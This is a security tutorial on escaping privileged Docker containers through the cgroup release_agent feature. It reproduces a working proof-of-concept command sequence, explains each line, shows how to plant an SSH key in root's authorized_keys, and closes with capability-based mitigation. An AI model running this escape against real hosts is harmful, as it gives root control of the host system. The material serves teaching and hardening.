Escaping Docker Privileged Containers


Privileged Docker containers are containers that are run with the --privileged flag. Unlike regular containers, they have root privileges on the host machine.

Privileged containers are often used when the containers need direct hardware access to complete their tasks. However, privileged docker containers can enable attackers to take over the host system. Today, let’s look at how attackers can escape privileged containers.

Finding an exploitable container

But how can we tell if we are in a privileged container in the first place?

How can you tell if you’re in a container?

Cgroups is short for “control groups”. It is a Linux kernel feature that limits and isolates resource usage, and Docker uses it to isolate containers. You can tell if you are in a container by checking the init process’s control group in /proc/1/cgroup. If you are not inside a container, the control group should be /. If you are inside a Docker container, you should see /docker/CONTAINER_ID instead.
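As a rough sketch of that check, the helper below reads a cgroup file and reports whether any entry points under /docker/. The function name in_docker_cgroup is hypothetical, and the sketch assumes a cgroup v1 host with Docker's default cgroup layout. On cgroup v2 hosts or with other runtimes the file can look different, so treat a negative result as inconclusive.

```shell
# Hypothetical helper: succeed if the given cgroup file references a Docker cgroup.
# Defaults to the init process's cgroup file, as described above.
in_docker_cgroup() {
    cgroup_file=${1:-/proc/1/cgroup}
    # Each line looks like "ID:controllers:path"; look for a path under /docker/.
    grep -q ':/docker/' "$cgroup_file" 2>/dev/null
}

if in_docker_cgroup; then
    echo "init is in a Docker cgroup"
else
    echo "no Docker cgroup found for init"
fi
```

Passing a file path as the first argument makes it possible to try the helper against a saved copy of /proc/1/cgroup from another machine.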

How can you tell if a container is privileged?

Once you’ve determined that you are in a container, you need to determine if that container is privileged. The best way to do this is to run a command that needs a capability privileged containers have and see if it succeeds.

For example, you can try to add a dummy interface by using an iproute2 command. This command requires the NET_ADMIN capability, which the container would have if it is privileged.

ip link add dummy0 type dummy

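If this command runs successfully, you can conclude that the container has the NET_ADMIN capability. NET_ADMIN is part of the privileged capability set, so a container that lacks it is not privileged. Keep in mind that NET_ADMIN can also be granted on its own, so success shows that the capability is present rather than proving that the container is fully privileged. You can clean up the “dummy0” link after this test by running this command.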

ip link delete dummy0
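A complementary check that changes nothing on the system (it is not part of the test above) is to read the effective capability mask from /proc/self/status and test the NET_ADMIN bit, which is capability number 12 in the kernel's numbering. This is a minimal sketch: the function name has_cap is hypothetical, and as with the ip link probe, a set bit only shows that the capability is present.

```shell
# Hypothetical helper: succeed if capability number $2 is set in hex mask $1.
has_cap() {
    [ $(( (0x$1 >> $2) & 1 )) -eq 1 ]
}

# CapEff holds the effective capability set of the current process as a hex mask.
cap_eff=$(awk '/^CapEff:/ {print $2}' /proc/self/status 2>/dev/null)
cap_eff=${cap_eff:-0}   # fall back to an empty mask if the field is unavailable

# CAP_NET_ADMIN is capability number 12.
if has_cap "$cap_eff" 12; then
    echo "NET_ADMIN is present"
else
    echo "NET_ADMIN is missing, so this is not a privileged container"
fi
```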

Container escape

So how do you escape a privileged container? You can escape the container by using the script below. This example and PoC were taken from the Trail of Bits blog. Read the original post for a more detailed explanation of the PoC: https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/

mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

echo 1 > /tmp/cgrp/x/notify_on_release

host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)

echo "$host_path/cmd" > /tmp/cgrp/release_agent

echo '#!/bin/sh' > /cmd

echo "ps aux > $host_path/output" >> /cmd

chmod a+x /cmd

sh -c 'echo $$ > /tmp/cgrp/x/cgroup.procs'

This PoC works by exploiting cgroups’ “release_agent” feature.

After the last process in a cgroup exits, a command used to remove abandoned cgroups runs. This command is specified in the release_agent file and it runs as root on the host machine. By default, this feature is disabled, and the release_agent path is empty.
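To make the two moving parts concrete, here is a small sketch that checks whether release notification is armed for a cgroup: the release_agent file at the root of a cgroup v1 hierarchy must be non-empty, and the cgroup's own notify_on_release file must contain 1. The function name release_agent_armed and the paths passed to it are assumptions for illustration.

```shell
# Hypothetical helper: succeed if a release agent would run for the given cgroup.
# $1 = root of a mounted cgroup v1 hierarchy, $2 = a cgroup directory inside it.
release_agent_armed() {
    agent=$(cat "$1/release_agent" 2>/dev/null)
    notify=$(cat "$2/notify_on_release" 2>/dev/null)
    # Both conditions must hold: an agent path is set and notification is enabled.
    [ -n "$agent" ] && [ "$notify" = "1" ]
}

# Example paths only; adjust to wherever the hierarchy is mounted.
if release_agent_armed /tmp/cgrp /tmp/cgrp/x; then
    echo "release_agent is armed"
else
    echo "release_agent is not armed"
fi
```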

This exploit runs code through the release_agent file. We need to create a cgroup, specify its release_agent file, and trigger the release_agent by emptying the cgroup of processes. The first line in the PoC mounts the rdma cgroup controller at /tmp/cgrp and creates a child cgroup named x inside it.

mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

The next line enables release notifications for the x cgroup, so that the release_agent runs once the cgroup becomes empty.

echo 1 > /tmp/cgrp/x/notify_on_release

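Then, the next few lines write the path of our command file to the release_agent file. The release_agent runs on the host, so the path must be the host-side location of the container’s filesystem, which the PoC reads from /etc/mtab.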

host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)

echo "$host_path/cmd" > /tmp/cgrp/release_agent
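To see what the sed expression pulls out, the sketch below runs an equivalent extraction against a made-up mount table entry. It assumes the container uses Docker's overlay storage driver, where the container's writable layer appears as the upperdir option. The function name upperdir_from_mtab and the sample directory names are hypothetical, and the pattern spells out upperdir in full instead of using the PoC's shorter \perdir form.

```shell
# Hypothetical helper: print the overlay upperdir recorded in a mount table file.
upperdir_from_mtab() {
    sed -n 's/.*upperdir=\([^,]*\).*/\1/p' "${1:-/etc/mtab}"
}

# Made-up sample entry in the general shape of an overlay mount line.
sample=$(mktemp)
cat > "$sample" <<'EOF'
overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/AAAA,upperdir=/var/lib/docker/overlay2/abc123/diff,workdir=/var/lib/docker/overlay2/abc123/work 0 0
EOF

upperdir_from_mtab "$sample"   # prints /var/lib/docker/overlay2/abc123/diff
rm -f "$sample"
```

A file written to /cmd inside the container would then be reachable on the host at the printed directory followed by /cmd, which is the path the PoC stores in release_agent.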

Next, we write the command file itself. This script runs ps aux and saves the result to $host_path/output on the host, which appears as /output inside the container. We also need to set the script’s execute permission bits.

echo '#!/bin/sh' > /cmd

echo "ps aux > $host_path/output" >> /cmd

chmod a+x /cmd

Finally, trigger the attack by spawning a process inside the cgroup we created that exits immediately. Once that process ends, the cgroup is empty and the host runs our release_agent script as root. Because ps aux runs on the host, the /output file in the container now contains the host’s process list.

sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

You can use the PoC to execute arbitrary commands on the host system. For example, you can use it to write your SSH key to the root user’s authorized_keys file.

cat id_dsa.pub >> /root/.ssh/authorized_keys

Mitigation

How can you prevent this attack from happening? Instead of granting containers full access to the host system, you should give containers the individual “capabilities” they need.

Docker capabilities give developers granular control over the permissions of a container. Capabilities split the permissions normally bundled together as “root access” into individual privileges.

You can drop or add capabilities with the --cap-drop and --cap-add flags.

--cap-drop=all

--cap-add=LIST_OF_CAPABILITIES

For example, instead of running the container with --privileged, you can grant it the NET_ADMIN capability if it needs to perform network-related operations. This flag will grant the container the permissions to configure network interfaces, administer the firewall, and modify routing tables.

--cap-add NET_ADMIN
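Putting the two flags together, a least-privilege invocation drops every capability and adds back only the ones the workload needs. The sketch below builds that flag list from a set of capability names. The function name cap_flags is hypothetical, and IMAGE and COMMAND in the usage comment are placeholders.

```shell
# Hypothetical helper: build docker run flags that drop all capabilities
# and then add back only the ones named in the arguments.
cap_flags() {
    flags="--cap-drop=all"
    for cap in "$@"; do
        flags="$flags --cap-add=$cap"
    done
    printf '%s\n' "$flags"
}

cap_flags NET_ADMIN   # prints --cap-drop=all --cap-add=NET_ADMIN

# Usage sketch (IMAGE and COMMAND are placeholders):
#   docker run --rm $(cap_flags NET_ADMIN) IMAGE COMMAND
```

Starting from an empty set and adding capabilities one at a time keeps the container's privileges visible in the command line, which makes them easier to review than a blanket --privileged.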

Conclusion

If possible, avoid running docker containers with the --privileged flag. Privileged containers might allow attackers to break out of the container and gain control over the host system. Grant containers individual capabilities with the --cap-add flag instead.

Further reading

Cgroups and release_agent: https://www.kernel.org/doc/Documentation/cgroup-v1/cgroups.txt

List of Linux kernel capabilities: https://man7.org/linux/man-pages/man7/capabilities.7.html

Using docker securely: https://docs.docker.com/engine/security/security/#linux-kernel-capabilities

Security best practices for privileged containers: https://blog.trendmicro.com/trendlabs-security-intelligence/why-running-a-privileged-container-in-docker-is-a-bad-idea/

Vickie Li